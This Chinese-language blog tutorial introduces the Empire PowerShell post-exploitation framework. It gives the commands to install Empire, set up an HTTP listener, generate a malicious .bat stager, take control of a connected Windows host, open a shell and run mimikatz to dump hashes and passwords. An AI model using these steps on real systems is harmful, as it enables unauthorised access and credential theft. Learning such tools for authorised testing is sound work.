Empire框架指南(一)

2022-11-14 16:45:48 浏览数 (1)

Empire是针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透测试攻击框架,具有stager生成提权、权限维持的功能。Empire无需powershell.exe就能运行power shell代理的功能,有许多后期漏洞利用模块。类似于msf。

在kali中安装

在kali中安装很简单,我们只需执行下面命令即可。

代码语言:javascript复制
sudo apt install powershell-empire

启动服务端

这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动Empire powershell服务端

代码语言:javascript复制
powershell-empire server

启动Empire powershell 客户端

代码语言:javascript复制
powershell-empire client

牛刀小试

Empire的使用方法与msf的方法相同,先设置监听,生成木马,然后监听反弹代理。

输入Listeners进入监听页面,uselistener设置监听模式,共有7种模式

  • dbx
  • http
  • http_foreign
  • http_hop
  • http_mapi
  • http_com
  • meterpreter

这里,我们以http模块为例:

代码语言:javascript复制
uselistener http #监听方式为http
set Port 4321 #设置端口
execute #运行

现在配置完监听模块,我们来看看怎样生成shell.

使用windows/launcher_bat模块,来生成恶意shell。

代码语言:javascript复制
usestager windows/launcher_bat
set Listener http #设置监听方式
execute #运行

执行完成上面的命令后,我们的恶意文件已经生成。格式为bat

双击运行后,我们可以看到已经成功得到了会话。输入agents可以查看连接上的计算机的详细信息。

连接设备

和msf一样,我们需要连接当前在线的设备。interact 设备name

代码语言:javascript复制
interact V1T86EUN

运行help命令,可以看到具体的帮助文档。

由于命令比较多,这里我列举常用的一些命令

进入系统cmd

代码语言:javascript复制
shell

使用内置的mimikatz抓取hash和密码

代码语言:javascript复制
mimikatz

设备详细信息

代码语言:javascript复制
info

总结

empire模块和msf一样,功能很强大。配置相比msf略有不同。后期的文章中,我们还会重点更新!喜欢的小伙伴们欢迎点赞收藏!


版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/2162439

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

0 人点赞